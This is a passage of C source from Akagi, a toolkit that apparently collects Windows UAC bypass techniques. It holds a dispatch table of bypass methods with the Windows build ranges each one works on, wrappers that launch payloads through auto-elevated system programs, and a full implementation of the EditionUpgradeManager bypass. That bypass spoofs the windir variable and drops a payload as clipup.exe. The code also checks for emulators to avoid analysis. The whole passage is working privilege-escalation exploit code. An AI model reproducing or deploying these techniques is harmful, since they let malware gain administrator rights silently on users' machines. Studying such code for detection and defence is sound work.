    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDirectoryMock, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodShellSdctl, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodTokenModUIAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodEditionUpgradeManager, { NT_WIN10_REDSTONE1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodDebugObject, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodShellChangePk, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodMsSettings, { NT_WIN10_REDSTONE4, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodIeAddOnInstall, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodWscActionProtocol, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
    { MethodFwCplLua2, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
    { MethodProtocolHijack, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
    { MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
    { MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
    { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
    { MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
    { MethodVFServerTaskSched, { NT_WIN8_BLUE, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
    { MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
    { MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
    { MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
    { MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodRequestTrace, { NT_WIN11_24H2, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
    { MethodQuickAssist, { NT_WIN10_REDSTONE5, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};

/*
* IsMethodImplementedForWin32
*
* Purpose:
*
* Check if the method is implemented in the win32 version.
*
*/
__forceinline BOOL IsMethodImplementedForWin32(
    _In_ UCM_METHOD Method)
{
    UINT i;

    for (i = 0; i < RTL_NUMBER_OF(UCM_WIN32_NOT_IMPLEMENTED); i++)
        if (UCM_WIN32_NOT_IMPLEMENTED[i] == (ULONG)Method)
            return FALSE;

    return TRUE;
}

/*
* IsMethodMatchRequirements
*
* Purpose:
*
* Check system requirements of the given method.
*
*/
NTSTATUS IsMethodMatchRequirements(
    _In_ PUCM_API_DISPATCH_ENTRY Entry
)
{
#ifdef _DEBUG
    UNREFERENCED_PARAMETER(Entry);
#else
    //
    // Check Wow64 flags first. Disable this check for debugging build.
    //
    if (g_ctx->IsWow64) {
        if (Entry->DisallowWow64) {
            return STATUS_NOT_SUPPORTED;
        }
    }
#ifdef _WIN64
    else {
        //
        // Not required if Win32.
        //
        if (Entry->Win32OrWow64Required != FALSE) {
            return STATUS_NOT_SUPPORTED;
        }
    }
#endif //_WIN64

    //
    // Check availability. Disable this check for debugging build.
    //
    if (g_ctx->dwBuildNumber < Entry->Availability.MinumumWindowsBuildRequired) {
        return STATUS_NOT_SUPPORTED;
    }

    if (g_ctx->dwBuildNumber >= Entry->Availability.MinimumExpectedFixedWindowsBuild) {
        return STATUS_NOT_SUPPORTED;
    }
#endif

    return STATUS_SUCCESS;
}

/*
* PostCleanupAttempt
*
* Purpose:
*
* Attempt to clean up leftovers.
*
*/
VOID PostCleanupAttempt(
    _In_ UCM_METHOD Method
)
{
    switch (Method) {

    case UacMethodDISM:
    case UacMethodJunction:
        ucmDismMethodCleanup();
        break;

    case UacMethodWow64Logger:
    case UacMethodVFServerDiagProf:
        ucmMethodCleanupSingleItemSystem32(WOW64LOG_DLL, NULL);
        break;

    case UacMethodSXSConsent:
        ucmSXSMethodCleanup();
        break;

    case UacMethodSXSDccw:
        ucmSXSDccwMethodCleanup();
        break;

    case UacMethodHakril:
        ucmHakrilMethodCleanup();
        break;

    case UacMethodIscsiCpl:
        ucmIscsiCplMethodCleanup();
        break;

    case UacMethodAtlHijack:
        ucmMethodCleanupSingleItemSystem32(ATL_DLL, WBEM_DIR);
        break;

    default:
        break;
    }

    ucmConsolePrintValueUlong(TEXT("[+] PostCleanupAttempt for method"), (ULONG)Method, FALSE);
}

/*
* MethodsManagerCall
*
* Purpose:
*
* Run method by method id.
*
*/
NTSTATUS MethodsManagerCall(
    _In_ UCM_METHOD Method
)
{
    BOOL bParametersBlockSet = FALSE;
    NTSTATUS MethodResult, Status;
    ULONG PayloadSize = 0, DataSize = 0;
    PVOID PayloadCode = NULL, Resource = NULL;
    PVOID ImageBaseAddress = g_hInstance;
    PUCM_API_DISPATCH_ENTRY Entry;
    UCM_PARAMS_BLOCK ParamsBlock;

    if (wdIsEmulatorPresent3()) {
        return STATUS_NOT_SUPPORTED;
    }

    if (Method >= UacMethodMax) {
        return STATUS_INVALID_PARAMETER;
    }

    //
    // Is method implemented for Win32?
    //
#ifndef _WIN64
    if (!IsMethodImplementedForWin32(Method)) {
        return STATUS_NOT_SUPPORTED;
    }
#endif //_WIN64

#pragma warning(push)
#pragma warning(disable:33010) //BS disable.
    Entry = &ucmMethodsDispatchTable[Method];
#pragma warning(pop)

    Status = IsMethodMatchRequirements(Entry);
    if (!NT_SUCCESS(Status))
        return Status;

    ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Method"), Method, FALSE);
    ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Entry->PayloadResourceId"), Entry->PayloadResourceId, TRUE);

    if (Entry->PayloadResourceId != PAYLOAD_ID_NONE) {

        Status = supLdrQueryResourceDataEx(
            Entry->PayloadResourceId,
            ImageBaseAddress,
            &DataSize,
            &Resource);

        if (!NT_SUCCESS(Status)) {
            if (Status == STATUS_RESOURCE_TYPE_NOT_FOUND)
                return STATUS_INVALID_IMAGE_FORMAT;
            return Status;
        }

        if (DataSize == 0 || Resource == NULL) {
            return STATUS_INVALID_IMAGE_FORMAT;
        }

        PayloadCode = g_ctx->DecompressRoutine(Entry->PayloadResourceId, Resource, DataSize, &PayloadSize);
        if ((PayloadCode == NULL) || (PayloadSize == 0)) {
            return STATUS_DATA_ERROR;
        }
    }

    ParamsBlock.Method = Method;
    ParamsBlock.PayloadCode = PayloadCode;
    ParamsBlock.PayloadSize = PayloadSize;

    ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->Entry->SetParameters"), Entry->SetParameters, FALSE);

    //
    // Set shared parameters.
    //
    // 1. Execution parameters (flag, session id, winstation\desktop)
    // 2. Optional parameter from Akagi command line.
    //
    if (Entry->SetParameters) {
        bParametersBlockSet = supCreateSharedParametersBlock(g_ctx);
        ucmConsolePrintValueUlong(TEXT("[+] MethodsManagerCall->bParametersBlockSet"), bParametersBlockSet, FALSE);
    }

    MethodResult = Entry->Routine(&ParamsBlock);

    if (PayloadCode) {
        RtlSecureZeroMemory(PayloadCode, PayloadSize);
        supVirtualFree(PayloadCode, NULL);
    }

    //
    // Wait a little bit for completion.
    //
    if (Entry->SetParameters && bParametersBlockSet) {
        Status = supWaitForGlobalCompletionEvent();
        ucmConsolePrintStatus(TEXT("[+] MethodsManagerCall->supWaitForGlobalCompletionEvent"), Status);
        supDestroySharedParametersBlock(g_ctx);
    }

    //
    // Perform method-specific cleanup
    //
    PostCleanupAttempt(Method);

    return MethodResult;
}

/************************************************************
**
**
**
**    Method table wrappers
**
**
************************************************************/

UCM_API(MethodDeprecated)
{
    UNREFERENCED_PARAMETER(Parameter);
    return STATUS_NOT_SUPPORTED;
}

UCM_API(MethodTest)
{
#ifdef _DEBUG
    return ucmTestRoutine(Parameter->PayloadCode, Parameter->PayloadSize);
#else
    UNREFERENCED_PARAMETER(Parameter);
    return TRUE;
#endif
}

UCM_API(MethodSXS)
{
    return ucmSXSMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize,
        NULL,
        CONSENT_EXE,
        MSCONFIG_EXE,
        TRUE);
}

UCM_API(MethodDism)
{
    return ucmDismMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodWow64Logger)
{
    //
    // Requires x64 as this method abuses the wow64 logger mechanism.
    //
#ifdef _WIN64
    return ucmWow64LoggerMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
#else
    UNREFERENCED_PARAMETER(Parameter);
    return STATUS_NOT_SUPPORTED;
#endif
}

UCM_API(MethodUiAccess)
{
    return ucmUiAccessMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodMsSettings)
{
    LPWSTR lpszPayload = NULL;
    LPWSTR lpszTargetApp = NULL;
    WCHAR szTargetApp[MAX_PATH * 2];

    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    if (Parameter->Method == UacMethodMsSettings2)
        lpszTargetApp = COMPUTERDEFAULTS_EXE;
    else
        lpszTargetApp = FODHELPER_EXE;

    _strcpy(szTargetApp, g_ctx->szSystemDirectory);
    _strcat(szTargetApp, lpszTargetApp);

    return ucmShellRegModMethod(Parameter->Method, T_MSSETTINGS, szTargetApp, lpszPayload);
}

UCM_API(MethodTyranid)
{
    LPWSTR lpszPayload = NULL;

    UNREFERENCED_PARAMETER(Parameter);

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmDiskCleanupEnvironmentVariable(lpszPayload);
}

UCM_API(MethodJunction)
{
    return ucmJunctionMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodSXSDccw)
{
    return ucmSXSDccwMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodHakril)
{
    return ucmHakrilMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodCorProfiler)
{
    return ucmCorProfilerMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodCMLuaUtil)
{
    LPWSTR lpszParameter;

    UNREFERENCED_PARAMETER(Parameter);

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszParameter = g_ctx->szDefaultPayload;
    else
        lpszParameter = g_ctx->szOptionalParameter;

    return ucmCMLuaUtilShellExecMethod(lpszParameter);
}

UCM_API(MethodDccwCOM)
{
    LPWSTR lpszPayload = NULL;

    UNREFERENCED_PARAMETER(Parameter);

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmDccwCOMMethod(lpszPayload);
}

UCM_API(MethodDirectoryMock)
{
    return ucmDirectoryMockMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodShellSdctl)
{
    LPWSTR Payload = NULL;

    if (g_ctx->OptionalParameterLength == 0)
        Payload = g_ctx->szDefaultPayload;
    else
        Payload = g_ctx->szOptionalParameter;

    return ucmShellRegModMethod(Parameter->Method, T_CLASSESFOLDER, SDCLT_EXE, Payload);
}

UCM_API(MethodTokenModUIAccess)
{
    if (Parameter->Method == UacMethodTokenModUiAccess) {
        return ucmTokenModUIAccessMethod(Parameter->PayloadCode, Parameter->PayloadSize);
    }
    else {
        return ucmTokenModUIAccessMethod2(Parameter->PayloadCode, Parameter->PayloadSize);
    }
}

UCM_API(MethodEditionUpgradeManager)
{
#ifndef _WIN64
    UNREFERENCED_PARAMETER(Parameter);
    return STATUS_NOT_SUPPORTED;
#else
    return ucmEditionUpgradeManagerMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
#endif
}

UCM_API(MethodDebugObject)
{
    LPWSTR lpszPayload = NULL;

    UNREFERENCED_PARAMETER(Parameter);

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmDebugObjectMethod(lpszPayload);
}

UCM_API(MethodShellChangePk)
{
    LPWSTR lpszPayload = NULL;

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmShellRegModMethod(Parameter->Method, T_LAUNCHERSYSTEMSETTINGS, SLUI_EXE, lpszPayload);
}

UCM_API(MethodNICPoison)
{
#ifndef _WIN64
    UNREFERENCED_PARAMETER(Parameter);
    return STATUS_NOT_SUPPORTED;
#else
    if (Parameter->Method == UacMethodNICPoison) {
        return ucmNICPoisonMethod(
            Parameter->PayloadCode,
            Parameter->PayloadSize);
    }
    else if (Parameter->Method == UacMethodNICPoison2) {
        return ucmNICPoisonMethod2(
            Parameter->PayloadCode,
            Parameter->PayloadSize);
    }
    else
        return STATUS_NOT_SUPPORTED;
#endif
}

UCM_API(MethodIeAddOnInstall)
{
#ifdef _WIN64
    return ucmIeAddOnInstallMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
#else
    UNREFERENCED_PARAMETER(Parameter);
    return STATUS_NOT_SUPPORTED;
#endif
}

UCM_API(MethodWscActionProtocol)
{
    LPWSTR lpszPayload = NULL;

    UNREFERENCED_PARAMETER(Parameter);

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmWscActionProtocolMethod(lpszPayload);
}

UCM_API(MethodFwCplLua2)
{
    LPWSTR lpszPayload = NULL;

    UNREFERENCED_PARAMETER(Parameter);

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmFwCplLuaMethod2(lpszPayload);
}

UCM_API(MethodProtocolHijack)
{
    NTSTATUS Result = STATUS_ACCESS_DENIED;
    LPWSTR PayloadParameter = NULL, PayloadFinal = NULL;
    SIZE_T Size;

    //
    // Select target application or use given by optional parameter.
    //
    if (g_ctx->OptionalParameterLength == 0)
        PayloadParameter = g_ctx->szDefaultPayload;
    else
        PayloadParameter = g_ctx->szOptionalParameter;

    switch (Parameter->Method) {

    case UacMethodMsSettingsProtocol:
        Result = ucmMsSettingsProtocolMethod(PayloadParameter);
        break;

    case UacMethodMsStoreProtocol:

        Size = ((MAX_PATH * 2) + _strlen(PayloadParameter)) * sizeof(WCHAR);
        PayloadFinal = supHeapAlloc(Size);
        if (PayloadFinal) {
            _strcpy(PayloadFinal, g_ctx->szSystemDirectory);
            _strcat(PayloadFinal, CMD_EXE);
            _strcat(PayloadFinal, RUN_CMD_COMMAND);
            _strcat(PayloadFinal, PayloadParameter);
            Result = ucmMsStoreProtocolMethod(PayloadFinal);
            supHeapFree(PayloadFinal);
        }
        break;
    }

    return Result;
}

UCM_API(MethodPca)
{
#ifndef _WIN64
    UNREFERENCED_PARAMETER(Parameter);
    return STATUS_NOT_SUPPORTED;
#else
    return ucmPcaMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
#endif
}

UCM_API(MethodCurVer)
{
    UNREFERENCED_PARAMETER(Parameter);
#ifndef _WIN64
    return STATUS_NOT_SUPPORTED;
#else
    LPWSTR lpszPayload = NULL;
    LPWSTR lpszTargetApp = NULL;
    WCHAR szTargetApp[MAX_PATH * 2];

    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    lpszTargetApp = FODHELPER_EXE;

    _strcpy(szTargetApp, g_ctx->szSystemDirectory);
    _strcat(szTargetApp, lpszTargetApp);

    return ucmShellRegModMethod3(T_MSSETTINGS, szTargetApp, lpszPayload);
#endif
}

UCM_API(MethodMsdt)
{
    return ucmMsdtMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodDotNetSerial)
{
    LPWSTR lpszPayload = NULL;

    UNREFERENCED_PARAMETER(Parameter);

    if (g_ctx->OptionalParameterLength == 0)
        lpszPayload = g_ctx->szDefaultPayload;
    else
        lpszPayload = g_ctx->szOptionalParameter;

    return ucmDotNetSerialMethod(lpszPayload);
}

UCM_API(MethodVFServerTaskSched)
{
    return ucmVFServerTaskSchedMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}

UCM_API(MethodVFServerDiagProf)
{
    return ucmVFServerDiagProfileMethod(
        Parameter->PayloadCode,
        Parameter->PayloadSize);
}
UCM_API(MethodIscsiCpl) { return ucmIscsiCplMethod( Parameter->PayloadCode, Parameter->PayloadSize); } UCM_API(MethodAtlHijack) { #ifdef _WIN64 return ucmAtlHijackMethod(MMC_EXE, ATL_DLL, Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } UCM_API(MethodSspiDatagram) { #ifdef _WIN64 return ucmSspiDatagramMethod( Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } UCM_API(MethodRequestTrace) { #ifdef _WIN64 return ucmRequestTraceMethod( Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } UCM_API(MethodQuickAssist) { #ifdef _WIN64 return ucmQuickAssistMethod( Parameter->PayloadCode, Parameter->PayloadSize); #else UNREFERENCED_PARAMETER(Parameter); return STATUS_NOT_SUPPORTED; #endif } ================================================ FILE: Source/Akagi/methods/methods.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2014 - 2025 * * TITLE: METHODS.H * * VERSION: 3.68 * * DATE: 07 Mar 2025 * * Prototypes and definitions for UAC bypass methods table. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. 
* *******************************************************************************/ #pragma once typedef enum _UCM_METHOD { UacMethodTest = 0, //+ UacMethodSysprep1 = 1, UacMethodSysprep2, UacMethodOobe, UacMethodRedirectExe, UacMethodSimda, UacMethodCarberp1, UacMethodCarberp2, UacMethodTilon, UacMethodAVrf, UacMethodWinsat, UacMethodShimPatch, UacMethodSysprep3, UacMethodMMC1, UacMethodSirefef, UacMethodGeneric, UacMethodGWX, UacMethodSysprep4, UacMethodManifest, UacMethodInetMgr, UacMethodMMC2, UacMethodSXS, UacMethodSXSConsent, //+ UacMethodDISM, //+ UacMethodComet, UacMethodEnigma0x3, UacMethodEnigma0x3_2, UacMethodExpLife, UacMethodSandworm, UacMethodEnigma0x3_3, UacMethodWow64Logger, //+ UacMethodEnigma0x3_4, UacMethodUiAccess, //+ UacMethodMsSettings, //+ UacMethodDiskSilentCleanup, //+ UacMethodTokenMod, UacMethodJunction, //+ UacMethodSXSDccw, //+ UacMethodHakril, //+ UacMethodCorProfiler, //+ UacMethodCOMHandlers, UacMethodCMLuaUtil, //+ UacMethodFwCplLua, UacMethodDccwCOM, //+ UacMethodVolatileEnv, UacMethodSluiHijack, UacMethodBitlockerRC, UacMethodCOMHandlers2, UacMethodSPPLUAObject, UacMethodCreateNewLink, UacMethodDateTimeWriter, UacMethodAcCplAdmin, UacMethodDirectoryMock, //+ UacMethodShellSdclt, //+ UacMethodEgre55, UacMethodTokenModUiAccess, //+ UacMethodShellWSReset, UacMethodSysprep5, UacMethodEditionUpgradeMgr, //+ UacMethodDebugObject, //+ UacMethodGlupteba, UacMethodShellChangePk, //+ UacMethodMsSettings2, //+ UacMethodNICPoison, //+ UacMethodIeAddOnInstall, //+ UacMethodWscActionProtocol, //+ UacMethodFwCplLua2, //+ UacMethodMsSettingsProtocol,//+ UacMethodMsStoreProtocol, //+ UacMethodPca, //+ UacMethodCurVer, //+ UacMethodNICPoison2, //+ UacMethodMsdt, //+ UacMethodDotNetSerial, //+ UacMethodVFServerTaskSched, //+ UacMethodVFServerDiagProf, //+ UacMethodIscsiCpl, //+ UacMethodAtlHijack, //+ UacMethodSspiDatagram, //+ UacMethodTokenModUiAccess2, //+ UacMethodRequestTrace, //+ UacMethodQuickAssist, //+ UacMethodMax, UacMethodInvalid = 
    0xabcdef
} UCM_METHOD;

#define UCM_DISPATCH_ENTRY_MAX UacMethodMax

typedef struct _UCM_METHOD_AVAILABILITY {
    ULONG MinumumWindowsBuildRequired;      // if the current build is less than this value, the method does not work here
    ULONG MinimumExpectedFixedWindowsBuild; // if the current build is equal to or greater than this value, the method is fixed and does not work here
} UCM_METHOD_AVAILABILITY;

typedef struct tagUCM_PARAMS_BLOCK {
    UCM_METHOD Method;
    PVOID PayloadCode;
    ULONG PayloadSize;
} UCM_PARAMS_BLOCK, *PUCM_PARAMS_BLOCK;

typedef NTSTATUS(CALLBACK *PUCM_API_ROUTINE)(
    _In_ PUCM_PARAMS_BLOCK Parameter
    );

#define UCM_API(n) NTSTATUS CALLBACK n( \
    _In_ PUCM_PARAMS_BLOCK Parameter)

typedef struct _UCM_API_DISPATCH_ENTRY {
    PUCM_API_ROUTINE Routine;               // method to execute
    UCM_METHOD_AVAILABILITY Availability;   // min and max supported Windows builds
    ULONG PayloadResourceId;                // which payload dll must be used
    BOOL Win32OrWow64Required;
    BOOL DisallowWow64;
    BOOL SetParameters;                     // shared parameters need to be set
} UCM_API_DISPATCH_ENTRY, *PUCM_API_DISPATCH_ENTRY;

#include "elvint.h"
#include "routines.h"
#include "comsup.h"
#include "tests\test.h"

NTSTATUS MethodsManagerCall(
    _In_ UCM_METHOD Method);

================================================
FILE: Source/Akagi/methods/rinn.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2018 - 2025
*
*  TITLE:       RINN.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  FBK UAC bypass methods.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"

/*
* ucmEditionUpgradeManagerMethod
*
* Purpose:
*
* Bypass UAC using EditionUpgradeManager autoelevated interface.
* This function expects that supMasqueradeProcess was called on process initialization.
*
* EditionUpgradeManager has a method called AcquireModernLicenseWithPreviousId.
* During its execution MS code starts a Clipup.exe process from (what it supposes to be) the
* Windows system32 folder. However, since MS programmers are always lazy and apparently banned
* from their own documentation, it uses the environment variable "windir" to expand the Windows
* directory instead of using something like GetSystemDirectory.
* This gives us the opportunity (hello Nadella) to spoof the current user environment variable
* for the requested DllHost.exe, thus making their code launch our clipup.exe from a location
* we control.
*
*/
NTSTATUS ucmEditionUpgradeManagerMethod(
    _In_ PVOID ProxyDll,
    _In_ DWORD ProxyDllSize
)
{
    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;
    BOOL bEnvSet = FALSE;
    HRESULT hr_init;
    IEditionUpgradeManager *Manager = NULL;
    DWORD Data[3];
    LPOLESTR lpGuidDir = NULL;
    LPWSTR lpPath = NULL;
    LPWSTR stringPtr = NULL;
    SIZE_T nLen;
    GUID guidTemp;

    hr_init = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);

    do {

        if (CoCreateGuid(&guidTemp) != S_OK)
            break;

        if (StringFromCLSID(&guidTemp, &lpGuidDir) != S_OK)
            break;

        nLen = (1 + _strlen(lpGuidDir) + (MAX_PATH * 2)) * sizeof(WCHAR);
        lpPath = (LPWSTR)supHeapAlloc(nLen);
        if (lpPath == NULL)
            break;

        //
        // Replace default Fubuki dll entry point with new and remove dll flag.
        //
        if (!supReplaceDllEntryPoint(
            ProxyDll,
            ProxyDllSize,
            FUBUKI_DEFAULT_ENTRYPOINT,
            TRUE))
        {
            break;
        }

        //
        // Create %temp%\{GUID} directory.
        // _strcat returns a pointer to the terminating null; it is kept so the
        // path can be truncated back to %temp%\{GUID} during cleanup.
        //
        _strcpy(lpPath, g_ctx->szTempDirectory);
        stringPtr = _strcat(lpPath, lpGuidDir);

        if (!CreateDirectory(lpPath, NULL))
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;

        //
        // Set controlled environment variable.
        //
        bEnvSet = supSetEnvVariable(FALSE, NULL, T_WINDIR, lpPath);
        if (!bEnvSet)
            break;

        //
        // Create %temp%\{GUID}\system32 directory.
        //
        _strcat(lpPath, SYSTEM32_DIR);
        if (!CreateDirectory(lpPath, NULL))
            if (GetLastError() != ERROR_ALREADY_EXISTS)
                break;

        //
        // Drop payload to %temp%\{GUID}\system32 as clipup.exe and run target interface.
        //
        _strcat(lpPath, CLIPUP_EXE);
        if (supWriteBufferToFile(lpPath, ProxyDll, ProxyDllSize)) {

            if (FAILED(ucmAllocateElevatedObject(T_CLSID_EditionUpgradeManager,
                &IID_EditionUpgradeManager,
                CLSCTX_LOCAL_SERVER,
                &Manager)))
            {
                break;
            }

            if (Manager == NULL) {
                break;
            }

            Data[0] = 'f';
            Data[1] = 'f';
            Data[2] = 0;

            Manager->lpVtbl->AcquireModernLicenseWithPreviousId(Manager, MYSTERIOUSCUTETHING, (PDWORD)&Data);
            MethodResult = STATUS_SUCCESS;
        }

    } while (FALSE);

    if (Manager) Manager->lpVtbl->Release(Manager);

    //
    // Cleanup section.
    //
    // 1. Remove variable.
    // 2. Remove payload file.
    // 3. Remove fake directories.
    //
    if (bEnvSet) supSetEnvVariable(TRUE, NULL, T_WINDIR, NULL);

    CoTaskMemFree(lpGuidDir);

    supWaitForGlobalCompletionEvent();

    if (lpPath) {
        if (stringPtr) {
            DeleteFile(lpPath);
            *stringPtr = 0;
            _strcat(lpPath, SYSTEM32_DIR);
            RemoveDirectory(lpPath);
            *stringPtr = 0;
            RemoveDirectory(lpPath);
        }
        supHeapFree(lpPath);
    }

    //
    // S_FALSE (COM already initialized on this thread) also needs a matching
    // CoUninitialize, so test SUCCEEDED rather than == S_OK.
    //
    if (SUCCEEDED(hr_init)) CoUninitialize();

    return MethodResult;
}

================================================
FILE: Source/Akagi/methods/routines.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2014 - 2025
*
*  TITLE:       ROUTINES.H
*
*  VERSION:     3.68
*
*  DATE:        07 Mar 2025
*
*  Prototypes of methods for UAC bypass methods table.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
